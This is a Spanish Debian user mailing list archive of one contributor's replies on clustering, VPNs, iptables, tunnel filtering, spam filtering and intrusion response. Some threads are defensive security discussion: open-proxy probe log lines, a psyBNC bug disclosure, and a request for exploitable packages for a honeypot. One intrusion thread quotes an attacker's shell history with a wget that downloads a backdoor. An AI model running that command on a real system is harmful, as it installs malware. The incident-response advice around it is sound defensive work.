Re: Cluster de Apache/Web sobre Debian
Buenas Txente Txente wrote: Hola lista, Quiza sea un O.T. aunque siendo la plataforma sobre la que quiero montarlo, Debian, me parecio el mejor lugar para preguntar. En el trabajo tenemos la necesidad de montar un cluster web, y la verdad es que no tengo ni remota idea de por donde empezar. Las maquinas sobre las que se montaria todas tendrian Debian. Hasta ahi es sencillo. El problema viene al hacer que con una sola IP, acceda al servicio la maquina cliente, y si se cae una de las maquinas, automaticamente la siguiente de el relevo. Estuve googleando bastante ayer, y lo unico que vi parecido era algo llamado LVS, pero es un tema que aparentemente esta parado desde mediados de 2004, es un tema que podriamos llamar de extension de kernel y solo tiene hasta el kernel 2.4, siendo este un problema ya que las maquinas que usamos aqui tienen todas 2.6.8 LVS no es ni mucho menos un proyecto discontinuado, de hecho viene incluido en la rama 2.6 del kernel. Con LVS podría montar una granja de servidores web con una sola ip virtual. Además puedes usar heartbeat (www.linux-ha.org) para establecer un mecanismo de failover entre los servidores web de tal manera que si uno de los servidores web cae, el otro pueda suplantar su ip. ¿alguien ha tenido alguna vez la necesidad de hacer esto? ¿alguien lo ha hecho? Cualquier idea/sugerencia sera bien recibida. Enlaces: http://www.linux-ha.org/ http://www.ultramonkey.org/ Gracias y un saludo, Txente Un saludo, Iñaki R. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: VPNs y demases
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [EMAIL PROTECTED] wrote: OpenVPN no es compatible con IPSEC. Te repito: encripta con SSL/TLS. Y con IPSEC alguna conocida, buena y facil? Tengo entendido que Freeswan murio o sigue? FreeSwan sigue vivo, aunque desde la rama 2.6 del kernel la gente se ha tirado a usar el soporte nativo de ipsec del nucleo, que es más sencillo de utilizar. En la biblia del enrutamiento (o sea Linux Advanced Routing and Traffic Control - www.lartc.org) pudes encontrar ejemplos de uso. Salu2 a to2 y grax Un saludo, Iñaki R. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.0 (MingW32) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFCJelTi0sv9i/vNakRAuf0AJ94zSbc07JpUBX/jQIlMm93kgIDSQCgikS4 InRnovDVk+irWmZ1xQII6N4= =BdRR -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Filtrar tunel SOCKS/HTTP
Hola Alejandro, puedes probar una solución como integrar snort-inline dentro del firewall para cazar esos connects y denegarlos. Un saludo, Iñaki R. - Original Message - From: Alejandro [EMAIL PROTECTED] To: Debian Lista debian-user-spanish@lists.debian.org Sent: Tuesday, February 15, 2005 6:08 PM Subject: Filtrar tunel SOCKS/HTTP Hola, dias atras habia preguntado cosas sobre tuneles que usaban el metodo CONNECT y ya esta, ya lo tengo clarito. Ahora mi duda es con los tuneles que usan ciertos softwares como el http-tunnel para Windows (www.http-tunnel.com), el cual instala un server SOCKS en la PC de una LAN que escucha peticiones de programas como el navegador, P2P, clientes FTP, etc. y luego convierte todas esas peticiones en trafico HTTP que pasa por el port 80 del firewall tranquilamente. Ese trafico se direcciona a un servidor de tunel que esta en USA y este es el encargado en realizar las peticiones y devolverlas al cliente original. En definitiva, el firewall/proxy de la LAN solo ve pasar trafico web y no sabe nada de su contenido. Yo tengo un esquema de seguridad con linux/iptables/squid pero cuando activo el http-tunnel en una Windows de mi red interna, me saltea toda la seguridad y no se como hacer para filtrarlo. Supongo que algun firewall con filtrado de contenido en capa 7 podria hacerlo, pero me gustaria que me digan uds. que harian y si se puede filtrar este tipo de tunel. Muchas gracias como siempre. Alejandro -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Filtrar tunel SOCKS/HTTP
Lo que puedes hacer un volcado de los paquetes que saca http tunnel y observar su compartamiento. Después en base a ese estudio, puedes generar una regla en snort-inline para que deniegue esas conexiones. Un saludo y suerte ;) Iñaki R. - Original Message - From: Alejandro [EMAIL PROTECTED] To: Iñaki R. [EMAIL PROTECTED]; Debian Lista debian-user-spanish@lists.debian.org Sent: Tuesday, February 15, 2005 6:50 PM Subject: Re: Filtrar tunel SOCKS/HTTP Iñaki, gracias por responder. Pero justamente este software no usa el metodo CONNECT (eso creo yo) dado que el SQUID tiene denegado dicho metodo hacia ningun otro port que no sea el 443, y asi y todo el trafico sale igual por HTTP. Y la explicacion del software (http://www.http-tunnel.com/html/solutions/http_tunnel/client.asp) dice que saca todo el trafico a traves del port 80 (y no del 443 o algun otro accesado por el metodo CONNECT)...me confunde. En fin...vere si lo puedo sacar. Muchas gracias !!! Alejandro - Original Message - From: Iñaki R. [EMAIL PROTECTED] To: Debian Lista debian-user-spanish@lists.debian.org Sent: Tuesday, February 15, 2005 2:20 PM Subject: Re: Filtrar tunel SOCKS/HTTP Hola Alejandro, puedes probar una solución como integrar snort-inline dentro del firewall para cazar esos connects y denegarlos. Un saludo, Iñaki R. - Original Message - From: Alejandro [EMAIL PROTECTED] To: Debian Lista debian-user-spanish@lists.debian.org Sent: Tuesday, February 15, 2005 6:08 PM Subject: Filtrar tunel SOCKS/HTTP Hola, dias atras habia preguntado cosas sobre tuneles que usaban el metodo CONNECT y ya esta, ya lo tengo clarito. Ahora mi duda es con los tuneles que usan ciertos softwares como el http-tunnel para Windows (www.http-tunnel.com), el cual instala un server SOCKS en la PC de una LAN que escucha peticiones de programas como el navegador, P2P, clientes FTP, etc. y luego convierte todas esas peticiones en trafico HTTP que pasa por el port 80 del firewall tranquilamente. Ese trafico se direcciona a un servidor de tunel que esta en USA y este es el encargado en realizar las peticiones y devolverlas al cliente original. En definitiva, el firewall/proxy de la LAN solo ve pasar trafico web y no sabe nada de su contenido. Yo tengo un esquema de seguridad con linux/iptables/squid pero cuando activo el http-tunnel en una Windows de mi red interna, me saltea toda la seguridad y no se como hacer para filtrarlo. Supongo que algun firewall con filtrado de contenido en capa 7 podria hacerlo, pero me gustaria que me digan uds. que harian y si se puede filtrar este tipo de tunel. Muchas gracias como siempre. Alejandro -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: [APACHE] extraña petición en mi access_log
Buenas, Son pruebas para ver si el proceso que escucha en ese puerto puede ser usadao como un Proxy http abierto. Saludo, Iñaki R. -Mensaje original- De: Mstaaravin / [mailto:[EMAIL PROTECTED] Enviado el: miércoles, 13 de octubre de 2004 16:19 Para: debian-user-spanish@lists.debian.org Asunto: [APACHE] extraña petición en mi access_log Buenas, revisando los logs de mi Apache me he encontrado con esta petición un tanto extraña, mas a sabiendas que mi Apache le respondió con un 200 (http OK) Y a pesar que estoy buscando info en foros y demas no le encuentro la explicación. Alguien sabe identificarla.? 65.59.208.125 - - [13/Oct/2004:11:32:22 +] POST http://65.59.208.125:25/ HTTP/1.1 200 785 65.59.208.125 - - [13/Oct/2004:11:32:22 +] CONNECT mailin-02.mx.aol.com:25 HTTP/1.0 200 785 65.59.208.125 - - [13/Oct/2004:12:12:43 +] CONNECT mx2.optonline.net:25 HTTP/1.0 200 785 65.59.208.125 - - [13/Oct/2004:12:12:43 +] POST http://65.59.208.125:25/ HTTP/1.1 200 785 -- Cordiales Saludos La Voluntad es el único motor de nuestros logros Mstaaravin http://www.mstaaravin.com.ar -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: listar usuarios desde la consola
Buenas, blackshadow:~# cat /etc/passwd | cut -d: -f1 Un saludito listeros/as Iñaki R. -Mensaje original- De: Roberto Lizana Ramirez [mailto:[EMAIL PROTECTED] Enviado el: miércoles, 13 de octubre de 2004 15:52 Para: debian-user-spanish@lists.debian.org Asunto: listar usuarios desde la consola Ummm, no se, se ve que el puente me ha dejado un poco acarajotado, la pregunta es muy tonta pero... ¿Cómo puedo listar los usuarios que tiene mi sistema desde la consola? Perdon por la pregunta pero es que ya estoy desesperado preguntandole al dios google y no tengo forma de que me de una señal. Gracias de antemano --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.776 / Virus Database: 523 - Release Date: 12/10/2004
[OT?] Bug en psybcn 2.3.2-4
Buenas a todos/as, Posiblemente esta no se la lista más adecuada, pero bueno yo os aviso que no está de más. Hace una semana más o menos descubrí un fallo en este programa, psybnc, que para los que no lo sepan, se usa para hacer de bouncer a una red de irc. El caso es que instalándoselo a un amigo me di cuenta de que podía bajarme cualquier fichero del servidor donde lo tenía. Avisé a sus programadores aunque aún no me han dicho nada (no sé, pero parece que lo tienen bastante abandonado). Posiblemente alguno de los presentes lo use en algún servidor (me consta que mucha gente vende este tipo de conexiones), así que para que no se preocupen, os dejo una web donde tengo tanto el advisory (que si alguien quiere traducirlo al inglés...) y un parche para corregir este fallo. http://virtualminds.sytes.net Un saludo gentes, Iñaki R. (Shad)
RE: Paquetes antiguos
Gracias Santiago, es justo lo que estaba buscando. Un saludo, Iñaki R. -Mensaje original- De: Santiago Vila [mailto:[EMAIL PROTECTED] Enviado el: viernes, 30 de julio de 2004 12:17 Para: debian-user-spanish@lists.debian.org Asunto: Re: Paquetes antiguos On Fri, 30 Jul 2004, Iñaki R. wrote: estoy haciendo un pequeño honeypot para aumentar conocimientos y necesitaría paquetes antiguos de debian que sean explotables. Hace tiempo creo que leí que con apt podías bajarte versiones antiguas de los paquetes, pero no me hagáis mucho caso. Mi pregunta: Sabéis si hay alguna manera de conseguir estos paquetes antiguos y explotables?? http://snapshot.debian.net
Paquetes antiguos
Buenas a todos/as, estoy haciendo un pequeño honeypot para aumentar conocimientos y necesitaría paquetes antiguos de debian que sean explotables. Hace tiempo creo que leí que con apt podías bajarte versiones antiguas de los paquetes, pero no me hagáis mucho caso. Mi pregunta: Sabéis si hay alguna manera de conseguir estos paquetes antiguos y explotables?? Saludos Iñaki R. (Shad)
RE: Manejo IPTABLES
Hola Laura, Iptables en cuanto añades una regla, ya la tiene presente por lo que debería mostrártela con iptables -L -n Sin embargo, cuando la tabla en la que metes las reglas no es la principal (filter) sino otra como la nat, para mostrarlo deberías poner iptables -t nat -L -n No digo que este sea el problema, porque es mera conjetura, puesto que no dispongo de más datos. Si te parece bien, podrías mandar a la lista un log con los comandos y sus salidas respectivas a ver si entre todos/as te podemos ayudar. Si quieres hacer las reglas permanentes, existe un comando que es iptables-save para hacerlo, aunque yo te recomendaría que te hicieras un script antes que usar esta última solución. Un saludo, Iñaki R. -Mensaje original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Enviado el: martes, 27 de julio de 2004 13:18 Para: Lista Debian Asunto: Manejo IPTABLES Hola a [EMAIL PROTECTED], estoy añadiendo algunas reglas a iptables, pero no se como comprobar que abren los puertos correctamente y demas, con iptables -L -n compruebo las reglas, pero ¿como hago para q actualice los cambios? ¿es necesario reiniciar todo el sistema? con /etc/init.d/iptables lo que sea no consigo modificar la salida de iptables -L -n, por lo que supongo que no se realizan cambios si no reinicio completamente, pero debe de haber una manera de hacerlo sin reiniciar, si hago -F y luego -L -n me vuelve a cargar lo mismo que antes ¿es posible porque este como established y este conectado? ¿como se comprueba? Gracias.. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: problema con scanf (novato)
Weno, Efectivamente por lo que leo en el man, __fpurge() era lo que necesitabas. Se ve que fflush() no actua en Linux como en otras plataformas. De todas formas, cuidado con la función que no es estandar. Espero haberte ayudado algo, el C es un lenguaje algo complicado al empezar, pero con el tiempo llega a ser apasionante y realmente muy potente. Totalmente de acuerdo con segmentation_fault ;)) Un saludo, Iñaki R. p.d: Para más adelante, cuidado con scanf y los buffers overflows
RE: Jail vs. Chroot
Yo por mi parte, he probado un par de veces chroot, para aislar ciertos procesos propensos al bug. Aun así no me convencía mucho. Al final opté por uml para tener dos máquinas en la misma, una en la que instalo los servicios y la otra que uso para mis cosas. Aunque no es un servidor en producción, sino más bien, un servidor personal donde desarrollo mis cosillas. Sirva para avivar la discusión jeje Un saludo a todos/as, Iñaki R. -Mensaje original- De: Matias [mailto:[EMAIL PROTECTED] Enviado el: miércoles, 23 de junio de 2004 4:46 Para: debian-user-spanish@lists.debian.org Asunto: Re: Jail vs. Chroot El Tue, 22 Jun 2004 08:47:09 -0400 (PYT) Caba [EMAIL PROTECTED] escribió: Hace tiempo que vengo implementado chroot, indistintamente con diversas aplicaciones, el drama surge al escapar los procesos de la prisión, siempre ocurre, por lo que Jail de FreeBSD estara siempre por encima de mismo. Hola: No entiendo muy bien tu duda, pero por lo que planteas es que deseas un comentario sobre chroot y jail. Yo por ahora nunca pude implementar un jail bajo GNU/Linux, pero si lo he implementado sobre otro sistema operativo. La diferencia mayor, como tu planteas, es que jail queda pro sobre todas las cosas, los procesos que se ejecutan dentro del jail (casi) NUNCA podrán salir hacia afuera. Esto quiere decir, que necesitarás (dentro de la jaula) tener usuarios, ciertos dispositivos (como el /dev/null), y lo más importante, todo lo que ejecutes dentro de la jaula quedará dentro de la jaula, y lo que se está ejecutando fuera de la jaula será invisible a ésta. Esto es una diferencia muy grande con respecto al jail y chroot, dado que el chroot solamente cambia el raíz de lugar. Lo que no implica nada cuando estás hablando de cosas que pueden resultar nocivas para tu entorno. Pero ten en cuenta que ambos entornos de trabajo son muy útiles para distintas cosas. Por ejemplo, si tu estás haciendo una instalación (al estilo bootstrap), con un simple chroot es suficiente. Ahora bien, si tu quieres montar un servidor web con algunas aplicaciones en las cuales tu no confías mucho, y quieres resguardar un poco tu sistema (y no tienes máquinas como para hacerlo en distintas máquinas), o quieres probar la instalación de algunas cosas, un entorno jail creo que es muy conveniente. -- Atentamente, yo Matías CookBookXML: http://nnss.d7.be/~matias/CookBookXML/bin http://www.nnss.d7.be http://savannah.gnu.org/projects/tasklist -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: Ruteo sin NAT..
Buenas, no me ha quedado muy claro la cantidad de ips públicas que tienes. Te hago un grafiquillo de cómo lo entiendo. Ipp1 [Internet] - [Cisco] -- [ router Linux ] Ipp2 / ipp3 | ipp4 \ / | \ /| \ [RED1][RED2] [RED3] Espero que salga bien. Entiendo que en cada red hay un equipo con una ip pública más. Bien, si es así, yo dejaría al router Linux solamente con la ip pública, en caso de que no vayas a prestar más servicio que el de routing. Si quieres tener servicios tipo web, ftp, mail, etc ... puedes habilitar una red aparte para los servicios y el resto como lo tienes pero con ips privadas. Un saludete, Iñaki R. -Mensaje original- De: SeB@ [mailto:[EMAIL PROTECTED] Enviado el: martes, 20 de abril de 2004 18:35 Para: debian-user-spanish@lists.debian.org Asunto: Ruteo sin NAT.. Pregunta para los mas experimentados :-) Es posible hacer un ruteo sin hacer NATeo?? la idea es la siguiente: Tengo una conexion a internet y 16 ips un Cisco 2600 conectado a movicon quien me provee internet, luego a este tegno conectado una pc con linux que hace de router porque distribuye el servicio de internet a 3 redes diferentes (esa es la idea) Otro dato a tener en cta es que tengo ip publica en el cisco, en el router linux(en las 4 eth) y en una de las pc de cada red conectada al router linux. me conviene hacer NAT y dejar de moletar?? saludos
RE: Evitar Spam en QMail
Hola Gorka, Yo tenía algo parecido a lo que propone en qmailrocks. Solo tenía la parte de filtrado de virus, y con iptables en el gateway escaneaba todo el smtp entrante y saliente. Solo me falló una vez y era porque el disco duro tenía poca capacidad y se me lleno descomprimiendo un kernel. Actualmente lo tengo montado en casa, en un pequeño servidor que gestiona un par de listas. Sobre lo del spam, conozco a mucha gente que implementa o bien spamassasin o bogofilter en qmail y les va de perlas. Y por si dudas de esa web, te diré que en la lista de qmail-es siempre que alguien pregunta como hacer algo por el estilo, es directamente redireccionado a qmailrocks.org. Sin miedo y a por ello, Iñaki R. -Mensaje original- De: Gorka Garay [mailto:[EMAIL PROTECTED] Enviado el: martes, 30 de marzo de 2004 16:28 Para: debian-user-spanish Asunto: Evitar Spam en QMail Hola lista, Tengo qmail instalado y funcionando perfectamente con varios dominios. Ahora querria probar a instalar algun software para eliminar spam y/o virus en el propio servidor y he encontrado esto: http://www.qmailrocks.org/install_db.htm No quiero romper nada que ya funciona (lo mejor es enemigo de lo bueno) asi que me gustaria asegurarme lo mas posible de que no me va a pasar nada malo... Alguien ha hecho algo asi? Creeis que lo que dice ese articulo puede resultar? Vuestra opinion me hara lanzarme a intentarlo, si me confirmais que lo que se dice ahi tiene sentido y /o lo habeis hecho ya. Salu2 y gracias. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: bloquiar
Mirate la combinación Squid + DansGuardian, el primero hace de Proxy y el segundo actua como gestor de contenidos. Es un poco pesado, pero funciona bastante bien. http://www.squid-cache.org/ http://dansguardian.org/ Un saludo, Iñaki R. De: silviaguandique [mailto:[EMAIL PROTECTED] Enviado el: lunes, 22 de marzo de 2004 6:09 Para: debian-user-spanish@lists.debian.org CC: [EMAIL PROTECTED] Asunto: bloquiar quiero saber como bloquiar paginas de porno grafia
RE: Filtros de contenido en linux
Buenas, Prueba Squid + DansGuardian Un saludo, Iñaki R. -Mensaje original- De: Nerox NRX [mailto:[EMAIL PROTECTED] Enviado el: miércoles, 25 de febrero de 2004 9:18 Para: debian-user-spanish@lists.debian.org Asunto: Filtros de contenido en linux Hola, ¿Conoceis algun filtro de contenido para linux? Gracias. _ Encuentra a tu media naranja entre los perfiles que más te gusten. Toda la magia del romance en MSN Amor Amistad. http://match.msn.es/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RV: Fui atacado]
Buenas, Antes de nada saludos a la lista que es la primera vez que posteo. A renglón seguido, puedes probar a mirar en /proc los números de proceso. Los directorios que son numeros, son los identificadores de los procesos que hay. Puedes acceder a ellos y con un simple cat ver datos sobre ese proceso. Además puedes comprobar si con lsmod observas algún módulo extraño. Si lo ha hecho bien, que lo dudo, si ha troyanizado el sistema no aparecerá. Pero igual suena la campana y lo pillas. Observa los logs en /var/log para ver si puedes recabar más info sobre el tipo que te ha entrado. Mira tambien que no haya en tu home otros históricos de otros interpretes (que se suele hacer para dejar las menos huellas posibles). Con netstat -vaptn podrás observar (repito que siempre y cuando no esté bien troyanizado el sistema) los procesos que escuchan cada puerto. Y como punto final, la próxima vez usa algo como Aide para hacer una imagen del sistema intacta y comparar en caso de que creas que ha habido una intrusión. Un saludo a todos/as, Iñaki R. -Mensaje original- De: SoTaNeZ [mailto:[EMAIL PROTECTED] Enviado el: viernes, 20 de febrero de 2004 16:40 Para: debian-user-spanish@lists.debian.org Asunto: Re: Fui atacado] == nada de fecha 18 de febrero en el syslog. Luego hice un history y me == aparecio esto que por su puesto yo no lo hice(màs raro aun): == == 484 cat /etc/issue == 485 ps == 486 bash == 487 /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin == 488 netstat -a == 489 cd /lib/security/.config/bin == 490 cd /lib/security/.config == 491 dir == 492 cd ssh == 493 dir == 494 cd .. == 495 wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496 == /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz == 497 wget == http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2 .3.10-x86-linux.tar.gz == 498 wget geocities.com/s3rjiu/backdoor/ser.tar.gz == == Esto paquete porsuesto no los baje. Parece que se han colado en tu ordenador y se han bajado un backdoor de esos (y no ha borrado el historial, animalito). Pues yo me iría para empezar a la pagina de la que se ha bajado el backdoor, para ver que es lo que hace, y conectate a internet lo menos posible, y pon un firewall que bloquee practicamente todo menos lo necesario. Mira los servicios abiertos a internet y el kernel, a ver que vulnerabilidades tienen. También te puedes bajar el manual análisis forense en linux o algo así que esta en es.tldp.org. Y si quieres una lista mejorcita pues apuntate a la lista hackindex (busca en google la web). == == Ah hago un ps y no sale nada, me dice esto: == Violación de segmento Vaya, eso igual lo ha echo el troyano. No soy ningún experto, asi que no puedo ayudar más, saludos. == Cual es la inseguridad que tengo? == == Gracias y saludos.. == == -- == Federico Contreras == T.S.U. en Informática == U.D.O. == -- No hay nada peor que ser vulgar [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]